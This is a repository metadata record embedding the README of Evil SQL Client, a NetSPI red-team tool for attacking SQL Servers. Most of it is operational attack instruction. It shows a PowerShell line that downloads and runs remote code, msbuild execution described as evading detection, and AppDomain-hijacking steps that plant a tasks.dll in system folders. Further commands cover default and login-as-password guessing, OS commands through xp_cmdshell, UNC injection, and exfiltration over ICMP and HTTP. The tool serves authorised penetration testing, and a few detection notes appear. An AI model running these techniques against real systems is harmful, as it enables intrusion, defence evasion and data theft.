{"id":13542186,"url":"https://github.com/NetSPI/ESC","last_synced_at":"2025-04-02T09:33:26.814Z","repository":{"id":142612198,"uuid":"258401697","full_name":"NetSPI/ESC","owner":"NetSPI","description":"Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.","archived":false,"fork":false,"pushed_at":"2023-04-25T14:39:35.000Z","size":3582,"stargazers_count":289,"open_issues_count":2,"forks_count":42,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-04-02T07:50:06.293Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NetSPI.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2020-04-24T04:05:25.000Z","updated_at":"2025-03-21T22:14:19.000Z","dependencies_parsed_at":null,"dependency_job_id":"8bdac305-c644-41de-8092-563c65e38306","html_url":"https://github.com/NetSPI/ESC","commit_stats":null,"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NetSPI%2FESC/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NetSPI","download_url":"https://codeload.github.com/NetSPI/ESC/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246789230,"owners_count":20834251,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T10:01:02.569Z","updated_at":"2025-04-02T09:33:23.183Z","avatar_url":"https://github.com/NetSPI.png","language":"C#","readme":"![evilsqlclient](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-logo.png)\u003cbr\u003e\n\n--------------------------\u003cbr\u003e\nEvil SQL Client (ESC)\u003cbr\u003e\nVersion: v1.0 \u003cBr\u003e\nAuthor: Scott Sutherland (@_nullbind), NetSPI 2020\u003cBr\u003e\n\u003cbr\u003e\nEvil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.  While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting Active Directory domain joined SQL Servers during penetration tests and red team engagements.   The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.\u003cbr\u003e\n \nMost of ESC's functionality is based on the [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL/wiki/), [DAFT](https://github.com/NetSPI/DAFT), [SQLC2](https://github.com/NetSPI/SQLC2), and [SQLInjectionWiki](https://sqlwiki.netspi.com/) projects which are also related to SQL Server.  At the moment ESC does not have full feature parity with the PowerUpSQL or DAFT, but the most useful bits are there.\n\nBelow is a summary of what is covered in this readme:\n\u003cbr\u003e\u003cbr\u003e\n\u003cstrong\u003eExecution Options\u003c/strong\u003e\u003cbr\u003e\n* \u003ca href=\"#compileexe\"\u003eCompile source and run via exe\u003c/a\u003e\n* \u003ca href=\"#runexe\"\u003eDownload release and run via exe\u003c/a\u003e\n* \u003ca href=\"#runmsbuild\"\u003eDownload and run through MSBuild\u003c/a\u003e\n* \u003ca href=\"#runps\"\u003eDownload and run through PowerShell\u003c/a\u003e\n* \u003ca href=\"#runappdomain\"\u003eDownload and run through AppDomain Hijacking\u003c/a\u003e\n\n\u003cstrong\u003eCommand Options\u003c/strong\u003e\u003cbr\u003e\n* \u003ca href=\"#supportedcommands\"\u003eSupported Commands (HELP)\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmddiscovery\"\u003eDiscovery Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdaccess\"\u003eAccess Check Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#targetone\"\u003eQuery Single Target\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#targetmany\"\u003eQuery Multiple Targets\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdescalate\"\u003ePrivilege Escalation Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#cmdexfiltrate\"\u003eExfiltration Command Examples\u003c/a\u003e \u003cbr\u003e\n* \u003ca href=\"#pendingcommands\"\u003ePending Commands\u003c/a\u003e \u003cbr\u003e\n\n\u003cstrong\u003eDetections\u003c/strong\u003e\n* MSBuild Tests: [Resource1](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md)\n* MSBuild Detection: [Resource1](https://github.com/MHaggis/CBR-Queries/blob/master/msbuild.md) | [Resource2](https://bleepsec.com/2018/11/26/using-attack-atomic-red-team-part1.html)\n* SQL Server Detection: [Resource1](https://github.com/NetSPI/PowerUpSQL/blob/master/templates/tsql/Audit%20Command%20Execution%20Template.sql)\n* AppDomain Detection - Consider monitoring for tasks.dll being written to c:\\Windows\\SysWow64\\Tasks\\ and c:\\Windows\\System32\\Tasks\\, affected files being copied out of system and program file directories, or the \"APPDOMAIN_MANAGER_TYPE\" and \"COMPLUS_Version\" environmental variables being set via the command line or via scripting engines. Disclaimer: I haven't tested the AppDomain detections on scale so I dont know how much white noise they will produce.\n\n# Execution Options \u003ca name=\"exec\"\u003e\nBelow is a list of options for running the Evil SQl Client (ESC).\n\n### Compile Source and Run Exe \u003ca name=\"compileexe\"\u003e\u003c/a\u003e\n1. Download the source from  [esc folder](https://github.com/NetSPI/ESC/tree/master/esc).\n1. Open the esc.sln file in Visual Studio.\n2. Select Build -\u003e Build Solution.\n3. Run esc.exe.\n\n![buildesc](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-compile-1.png) \n \n### Download Release and Run Exe \u003ca name=\"runexe\"\u003e\u003c/a\u003e\n1. Download compiled esc.exe from [releases](https://github.com/NetSPI/ESC/releases). \n2. Run esc.exe.\n\n![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-compile-2.png)\n  \n### Download and Run through MSbuild.exe \u003ca name=\"runmsbuild\"\u003e\u003c/a\u003e\n \nEvil SQL Client console can be run through msbuild inline tasks using the [esc.csproj file](https://github.com/NetSPI/ESC/blob/master/esc.csproj) or [esc.xml file](https://github.com/NetSPI/ESC/blob/master/esc.xml).\u003cbr\u003e  Using msbuild.exe to execute .net code through inline tasks is a technique that was researched and popularized by Casey Smith. \n\n\u003cstrong\u003eesc.proj\u003c/strong\u003e\u003cbr\u003e\nesc.proj includes all of the original Evil SQL Client (ESC) C Sharp source code inline. The inline .NET source code technique used in this variation seems to do a better job of avoiding detection than embedding the exe and calling through reflection.\n\n\u003cstrong\u003eesc.xml\u003c/strong\u003e\u003cbr\u003e\nesc.xml works a little differently and has the entire esc.exe hardcoded as a string which is then loaded through reflection using a technique highlighted in the [GhostBuild](https://github.com/bohops/GhostBuild) project by @bohops.  I should note that Windows Defender is pretty good at identifying this exe wrapping technique out of the box.\n\nUpdating esc.xml:\u003cbr\u003e\nTo update the esc.xml follow the instructions below:\n1. Download and compile esc.exe.\n2. Run [Out-Compressdll](https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-CompressedDll.ps1) (by @mattifestation) against esc.exe.\u003cbr\u003e\n`Out-CompressedDll -FilePath esc.exe | out-file output.txt`\n3. Replace the compressedBin string in esc.xml with the \"EncodedCompressedFile\" string generated from Out-CompressDll.\n4. Replace compressedBinSize with the size generated from Out-CompressDll.\n5. Run the script.\u003cbr\u003e\n`C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.xml`\n\n\u003cstrong\u003eExecution Examples\u003c/strong\u003e\u003cbr\u003e\nBelow are a few execution examples. Msbuild can accept a filepath on the command line, but no filepath is required if only one .csproj file exists in the directory your executing msbuild.exe from.  \n\nIn the examples below, esc.csproj has been renamed to 1.csproj:\n\u003cbr\u003e\u003cbr\u003e\n ` C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe ` \u003cbr\u003e\n ![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-msbuild-1.png) \n \u003cbr\u003e\u003cbr\u003e\n `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.csproj` \u003cBr\u003e\n `C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe esc.xml` \u003cbr\u003e\n![runescexe](https://github.com/NetSPI/ESC/blob/master/screenshots/start-esc-msbuild-2.png) \n\t\n### Download and Run Functions through PowerShell \u003ca name=\"runps\"\u003e\u003c/a\u003e\nBelow are some quick instructions for running ESC functions through PowerShell.\n\n1. Download esc.exe.\n2. Open PowerShell and load esc.exe through reflection.\u003cbr\u003e\n`[System.Reflection.Assembly]::LoadFile(\"c:\\temp\\esc.exe\")`\n3. Alternatively, [esc-example.ps1](https://github.com/NetSPI/ESC/blob/master/esc-example.ps1) contains a portable example generated using Out-Compressdll.  It can be loaded using the PowerShell command below.\u003cbr\u003e\n`IEX(New-Object System.Net.WebClient).DownloadString(\"https://raw.githubusercontent.com/NetSPI/ESC/master/esc-example.ps1\")`\n4. After the assmbly is loaded you can run the desired function.  Examples below.\n\u003cpre\u003e\n[evilsqlclient.Program+EvilCommands]::GetSQLServersBroadCast()\n[evilsqlclient.Program+EvilCommands]::GetSQLServersSpn()\n[evilsqlclient.Program+EvilCommands]::MasterDiscoveredList\n[evilsqlclient.Program+EvilCommands]::InstanceAllG = \"enabled\"\n[evilsqlclient.Program+EvilCommands]::CheckAccess()\n[evilsqlclient.Program+EvilCommands]::MasterAccessList\n[evilsqlclient.Program+EvilCommands]::CheckDefaultAppPw()\n[evilsqlclient.Program+EvilCommands]::CheckLoginAsPw()\n[evilsqlclient.Program+EvilCommands]::MasterAccessList\n\u003c/pre\u003e\n\n### Download and Run through AppDomain Hijacking\u003ca name=\"runappdomain\"\u003e\u003c/a\u003e\nApplication domains provide an isolation boundary for security, reliability, and versioning, and for unloading .NET assemblies. Application domains are typically created by runtime hosts, which are responsible for bootstrapping the common language runtime before an application is run.  A typical application loads several assemblies into an application domain before the code they contain can be executed.   The default AppDomainManager can be replaced by setting the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environmental variables. This provides users with the means load and execute .NET code from custom assemblies prior to the execution of the intended application, but within their process and thread.  \n\nReference: https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains  \n\nIt is possible to leverage that functionality and default write access to the c:\\windows\\system32\\tasks\\ directory to execute arbitrary .NET code through c:\\windows\\system32\\ and c:\\windows\\SysWow64\\ assemblies that import mscoree.dll. This technique was originally shared during Casey Smith's DerbyCon presentation [\".Net Manifesto - Win Friends and Influence the Loader\"](https://www.youtube.com/watch?v=BIJ2L_rM9Gc).\n\nBelow are instructions for executing ESC using this method.\n\n1. Compile [esc-appdomain-hijack.cs](https://github.com/NetSPI/ESC/blob/master/esc-appdomain-hijack.cs) to tasks.dll. \n\u003cpre\u003e\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.Reflection.dll /r:System.IO.Compression.dll /r:System.Runtime.InteropServices.dll /r:System.EnterpriseServices.dll /target:library /out:tasks.dll esc-appdomain-hijack.cs\t\t\t\n\u003c/pre\u003e\n\n2. Update environment variables. Note: process, user, or system could be targeted.\n\u003cpre\u003e\nset APPDOMAIN_MANAGER_ASM=tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null\nset APPDOMAIN_MANAGER_TYPE=Esc\nset COMPLUS_Version=v4.0.30319\n\u003c/pre\u003e\n\n3. Copy tasks.dll to target directories.\n\u003cpre\u003e\ncopy tasks.dll C:\\Windows\\System32\\Tasks\\tasks.dll \ncopy tasks.dll C:\\Windows\\SysWow64\\Tasks\\tasks.dll\n\u003c/pre\u003e\n\n4. Identify .exe in c:\\windows\\system32\\ that load mscoreee.dll.  This can be done quickly using the Get-PE function from Matt Graeber's [PowerShell Arsenal Project](https://github.com/mattifestation/PowerShellArsenal).\n\u003cpre\u003e\ngci c:\\windows\\system32\\*.exe | get-pe | where-object {$_.Imports.ModuleName -Contains \"mscoree.dll\"} | Select ModuleName -ExpandProperty modulename\n\u003c/pre\u003e\n\n5. Choose one of the affected commands and run it.\n\u003cpre\u003e\nExamples:\nC:\\windows\\system32\\acu.exe\nC:\\windows\\system32\\aitstatic.exe\nC:\\windows\\system32\\ClusterUpdateUI.exe\nC:\\windows\\system32\\dsac.exe\nC:\\windows\\system32\\FileHistory.exe\nC:\\windows\\system32\\LbfoAdmin.exe\nC:\\windows\\system32\\Microsoft.Uev.SyncController.exe\nC:\\windows\\system32\\mtedit.exe\nC:\\windows\\system32\\PresentationHost.exe\nC:\\windows\\system32\\RAMgmtUI.exe\nC:\\windows\\system32\\ScriptRunner.exe\nC:\\windows\\system32\\ServerManager.exe\nC:\\windows\\system32\\ShieldingDataFileWizard.exe\nC:\\windows\\system32\\stordiag.exe\nC:\\windows\\system32\\SynapticsUtility.exe\nC:\\windows\\system32\\TemplateDiskWizard.exe\nC:\\windows\\system32\\TsWpfWrp.exe\nC:\\windows\\system32\\UevAgentPolicyGenerator.exe\nC:\\windows\\system32\\UevAppMonitor.exe\nC:\\windows\\system32\\UevTemplateBaselineGenerator.exe\nC:\\windows\\system32\\UevTemplateConfigItemGenerator.exe\nC:\\windows\\system32\\Vmw.exe\n\u003c/pre\u003e\n\n![runappdomain](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack3.png) \n\nThis can also be done by copying the affected EXE and the tasks.dll to a directory that's writable by the user.  To detect those scenarios, consider monitoring for files being copied from system directories. However, note that attackers may be able to identify other affected EXEs on the system using the same discovery technique listed above.\n\n![runappdomain](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack4.png) \n\nUsing the steps below ESC can also be executed using cscript.exe once the tasks.dll has been written to disk.  Once again, based on Casey Smith's templates.\n\n1. Create the file trigger.js with the content below.\n\u003cpre\u003e\nnew ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'c:\\\\Windows\\\\System32\\\\Tasks';\nnew ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = 'tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null';\nnew ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = 'Esc';\nvar o = new ActiveXObject(\"System.Object\"); \n\u003c/pre\u003e\n\n2. Execute it using cscript.exe.\n\u003cpre\u003e\ncscript trigger.js\n\u003c/pre\u003e\n\n![runappdomain2](https://github.com/NetSPI/ESC/blob/master/screenshots/esc-execute-via-appdomain-hijack2.png) \n\nNote: Detections could include monitoring for tasks.dll being written to C:\\Windows\\System32\\Tasks\\tasks.dll and C:\\Windows\\SysWow64\\Tasks\\tasks.dll. Also, potentially the execution of the commands above without/with parameters.\n\nESC can also be executed through AppDomain hijacking using a configuration file.  \n\n1. Create a configuration file in same folder as the target assembly, and name it after the target binary.  Example below.\n\u003cpre\u003eScriptRunner.exe.config\u003c/pre\u003e\n\n2. Below is sample XML for the config file.\n\n```xml\n\u003cconfiguration\u003e\n\u003cruntime\u003e\n\u003cassemblyBinding xmlns=\"urn:schemas-microsoft-com:asm.v1\"\u003e\n\u003cprobing privatePath=\"C:\\Windows\\Tasks\"/\u003e \u003c/assemblyBinding\u003e\n\u003cappDomainManagerAssembly value=\"Tasks, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null\" /\u003e\n\u003cappDomainManagerType value=\"Esc\" /\u003e\n\u003c/runtime\u003e\n\u003c/configuration\u003e\n```\n3. Run the target binary.\n\n\u003cpre\u003eScriptRunner.exe\u003c/pre\u003e\n\nNote: Alternatively, the assemblyBinding and probing tags can be removed from the configuration file and replaced with the \n\u003cdevelopmentMode developerInstallation=\"true\"/\u003e  tag within the runtime tag.  If that tag is present in  the configuration file, \nthe .NET application will attempt to use the DEVPATH environmental variable as a search path for referenced assemblies. \nAs such, it can be used as an alternative to probing.\n\nReference: https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/how-to-locate-assemblies-by-using-devpath\n\n # Supported Commands \u003ca name=\"supportedcommands\"\u003e\u003c/a\u003e\n\n ### COMMAND LIST\n \u003cpre\u003e\n    SHOW:\n     show settings \t\t\tShow connection and exfil settings.\n     show discovered \t\t\tShow discovered instances. \n     show access  \t\t\tShow accessible instances, versions, and other information.\n     show help \t\t\t\tShow this help page.\n \n    CONFIGURE INSTANCE:\n     set targetall\t\t\tTarget all accessible SQL Server instances. List with 'show access' command.\n     set instance instancename\t\tTarget a single instance.  Instance formats supported include: \n \t\t\t\t    \tserver1\n \t\t\t\t    \tserver1\\instance1\n \t\t\t\t    \tserver1,1433\n     set connstring stringhere \t\tSet a custom connection string. Examples below.\n\t\t\t\t   \t Server=Server\\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1\n\t\t\t\t    \tServer=Server\\Instance;Database=Master;Integrated Security=SSPI;Connection Timeout=1;uid=Domain\\Account;pwd=Password;\n\t\t\t\t    \tServer=Server\\Instance;Database=Master;Connection Timeout=1;User ID=Username;Password=Password\n \n    CONFIGURE CREDENTIALS:\n     set username username \t\tUser for authenticatiing to SQL Server instances.\n \t\t\t\t   \tDefaults to current Windows user if no username or password is provided, but access SQL Login credentials.\n     set password password\t\tPassword for the provided username.  \n \t\t\t\t    \tDefaults to current Windows user if no user or password is provided.\n \n    QUERY COMMANDS:\n     set timeout 1\t\t\tSet query timeout. Useful over slow connections.\n     query\t\t\t\tArbitrary TSQL query can be executed once a valid connection string is configured.\n\t\t\t\t    \tTo run against all accessible instances type 'set targetall enabled'.\n\t\t\t\t    \tType the query, then go, and press enter. Multi-line queries are supported.\n\t\t\t\t    \tNote: You don't have to type the word 'query'.\n\t\t\t\t    \tExample:\n\t\t\t\t    \tSELECT @@VERSION\n\t\t\t\t    \tGO\n \n    DISCOVERY COMMANDS:\n     discover broadcast\t\t\tDiscover SQL Server instances via a broadcast request.\n     discover domainspn\t\t\tDiscover SQL Server instances via LDAP query to the default DC for MSSQL SPNs.\n     discover file filepath\t\tDiscover SQL Server instance listed in a file.  One per line.\n\t\t\t\t    \tFormat examples: \n\t\t\t\t    \thostname \n\t\t\t\t    \thostname\\instance\n\t\t\t\t    \thostname,port\n     show discovered\t\t\tDisplay the list of discovered SQL Server instances.\n     export discovered outpath\t\tExport the list of discovered SQL Server instances to a file. \n\t\t\t\t   \t Example: export discovered c:\\windows\\temp\\sqlinstances.txt\n     clear discovered\t\t\tClear list of discovered SQL Server instances.\n\n    INITAL ACCESS COMMANDS:\n     check access\t\t\tAttempts to log into all discovered SQL Server instances.  \n \t\t\t\t    \tUses current Windows/Domain user by default. \n\t\t\t\t    \tNote: Will use alternative credentials if provided. (set username / set password)\n     show access\t\t\tList SQL Server instances that can be logged into.\n     export access outpath\t\tExport list of SQL Server instances that can be logged into to a file.\n     clear access\t\t\tClear the in memory list of SQL Server instances that can be logged into.\t\t\t\n     check defaultlogins\t\tAttempts to identify SQL Server instances that match known application and attempts the associate usernames and passwords.\n\n\n    POST EXPLOITATION COMMANDS:\n     list serverinfo\t\t\tList server information for accessoble target SQL Server instances.\n     list databases\t\t\tList databases for accessoble target SQL Server instances.\n     list tables\t\t\tList tables information for accessoble target SQL Server instances.\n  \t\t\t\t    \tLimits results to databases the login user has access to.\n     list links\t\t\t\tList links information for accessoble target SQL Server instances.\n     list logins\t\t\tList logins information for accessoble target SQL Server instances.\n     list rolemembers\t\t\tList rolemember information for accessoble target SQL Server instances.\n     list privs\t\t\t\tCheck accessible target SQL Server instances for logins that use their login as a password.  \n     check loginaspw     \t\tCheck accessible target SQL Server instances for logins that use their login as a password.                         \n     check uncinject IP\t\t\tConnect to taret SQL Server instance and perform UNC injection back to provide IP.\t     \n     run OSCMD command\t\t\tRun os command through xp_cmdshell on the accessible target SQL Server instances. \n \t\t\t\t    \t*Requires sysadmin privileges.\n \n    CONFIGURE DATA EXFILTRATION: \n     set file enabled\n     set filepath c:\\temp\\file.csv\n     set icmp tenabled\n     set icmpip 127.0.0.1\n     set http enabled\n     set httpurl http://127.0.0.1\n     set encrypt enabled\n     set enckey MyKey!\n     set encsalt MySalt!\n\n    MISC COMMANDS:\n     help\n     clear\n     exit\n \u003c/pre\u003e\n \n ### Common Command Sequences \u003ca name=\"recommendcommands\"\u003e\u003c/a\u003e\nBelow are some common command examples to get you started.\n\n\u003cstrong\u003eDiscovering SQL Server Instances\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmddiscovery\"\u003e\u003c/a\u003e\nBelow are a few common methods to identify SQL Server on the network and domain without port scanning.\n \n`discover domainspn`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-DomainSPN.png)\u003cbr\u003e\n\n`discover broadcast`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-Broadcast.png)\u003cbr\u003e\n\n`show discovered`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Discovery-Show.png)\u003cbr\u003e\n\n\u003cstrong\u003eChecking Access to Discovered Instances\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdaccess\"\u003e\u003c/a\u003e\nAfter discovery, `check access` can be used to determine if the current or provided credentials can login into the discovered SQL Server instances.\n \n` set targetall enabled` \u003cbr\u003e\n` show settings`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-TargetAll.png)\u003cbr\u003e\n \n`check access`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-CheckAccess.png)\u003cbr\u003e\n \n`show access`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-ShowAccess.png)\u003cbr\u003e\n \n\u003cstrong\u003eQuery Single Target\u003c/strong\u003e \u003ca name=\"targetone\"\u003e \u003cbr\u003e\nBelow are commands that can be used to target and query a single SQL Server instance. \u003cbr\u003e\n\nFirst configure ESC to target a single instance.  This will automatically disable the \"targetall\" setting.\u003cbr\u003e\u003cbr\u003e\n`Set target MSSQLSRV04\\SQLSERVER2014` \u003cbr\u003e\n`Set username backdoor_account`\u003cbr\u003e\n`Set password backdoor_account`\u003cbr\u003e\n`Show settings`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance1.png)\u003cbr\u003e\n\nNext simply execute your query and end your TSQL with the keyword \"go\". \u003cbr\u003e\u003cbr\u003e \n`select @@version`\u003cbr\u003e\n`go`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance3.png)\u003cbr\u003e\n\nYou can also run \"list\" and other post exploitation commands against the target instance. \u003cbr\u003e\u003cbr\u003e \n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Target-Instance2.png)\u003cbr\u003e\n\n\u003cstrong\u003eQuery Multiple Targets\u003c/strong\u003e \u003ca name=\"targetmany\"\u003e \u003cbr\u003e\nBelow are commands that can be used to target and query all accessible SQL Server instances.  \u003cbr\u003e\n1. Import a list of target instances with the `discover file`, `discover domainspn`, or `discover broadcast` commands.\u003cbr\u003e\n2. Identify which instances you can log into. \u003cbr\u003e\n`check access`\u003cbr\u003e\n3. Enable multi instance targeting using the command below.  Once enabled all commands and queries will be run against all accessible SQL Server instances.\u003cbr\u003e\u003cbr\u003e\n`set targetall enabled`\u003cbr\u003e\n`show settings`\u003cbr\u003e\n4. Run query as normal.\u003cbr\u003e\n`select @@version`\u003cbr\u003e\n`go`\u003cbr\u003e\n\n\u003cstrong\u003eTesting for Common Password Issues\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdescalate\"\u003e\u003c/a\u003e\nBelow are some checks for common password issues that can be used to gain initial entry and escalate privileges in some environments.\nIf \"targetall\" is enabled the commands below with target all discovered or accessible instances.  However, if a single instance is provided, then \"targetall\" will automatically be disabled to ensure only the one instance is targeted.\n\n`check defaultpw` \u003cbr\u003e\n`check defaultpw` is run against discovered instances and does not require valid credentials. \u003cbr\u003e\n[Related Reading](https://blog.netspi.com/attacking-application-specific-sql-server-instances/) \u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/Access-CheckDefaultPw.png)\u003cbr\u003e\n \n`check loginaspw` \u003cbr\u003e\n`check loginaspw` can be used once authenticated to enumerated all logins and test if they are using the login as the password. \u003cbr\u003e\n[Related Reading](https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/) \u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/LoginAsPw1.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/LoginAsPw2.png)\u003cbr\u003e\n \n\u003cstrong\u003eRunning OS Commands\u003c/strong\u003e\u003cbr\u003e\nBelow is a ESC command for running OS commands on target instances.  It requires sysadmin privileges.\u003cbr\u003e\n\n`run oscmd whoami`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/RunOsCmd1.png)\u003cbr\u003e\n \n\u003cstrong\u003eSaving List of Accessible Servers\u003c/strong\u003e\u003cbr\u003e\nThe command below can be used to export a list of servers that you can log into.\u003cbr\u003e\n`export access c:\\temp\\access.csv`\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/AccessExport1.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/AccessExport2.png)\u003cbr\u003e\n \n\u003cstrong\u003eData Exfiltration Example: Local File\u003c/strong\u003e\u003cbr\u003e \u003ca name=\"cmdexfiltrate\"\u003e\u003c/a\u003e\nBelow is an example of how to exfiltrate data to a local file.\n \n`set file enabled`\u003cbr\u003e\n`set filepath c:\\temp\\output.csv`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil1.png)\u003cbr\u003e\n \n`select @@version`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil2.png)\u003cbr\u003e\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/FileExfil3.png)\u003cbr\u003e\n \n\u003cstrong\u003eData Exfiltration Example: ICMP\u003c/strong\u003e\u003cbr\u003e\nBelow is an example of how to exfiltrate data over ICMP with ESC.\n \n`set icmp enabled` \u003cbr\u003e\n`set icmpip 192.168.1.1`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil1.png)\u003cbr\u003e\n \n`select @@version`\n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil12.png)\u003cbr\u003e \n![examplescenario](https://github.com/NetSPI/ESC/blob/master/screenshots/IcmpExfil3.png)\u003cbr\u003e\n\n \n# Pending Commands \u003ca name=\"pendingcommands\"\u003e\u003c/a\u003e\n* Add logging w/ timestamps\n* Add discover local \n* Add discover udpscan\n* Add column find\n* Add domain account enumeration\n* Add link crawl + linkquery + linkoscmd\n* Add escalate dbowner\n* Add escalate imperonsate\n* Threading\n* Finish data encryption\n* Create python/powershell script to decrypt encrypted exfiltrated data\n* Rewrite query function to be more flexible\n\n# Pending fixes\n* Crashes when you just type go\n* Crashes when you type ctrl+c\n\n# Thank You\nBelow is a list of people who tested out esc and/or provided .net development guidance.  Thanks for all the help!\n- Alexander Leary (@0xbadjuju) \n- Ivan Da Silva   (@humble_desser)\n- Josh Weber      \n- Kevin Robertson (@kevin_robertson) \n","funding_links":[],"categories":["Exploitation"],"sub_categories":["SQL Injection"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNetSPI%2FESC","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNetSPI%2FESC","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNetSPI%2FESC/lists"}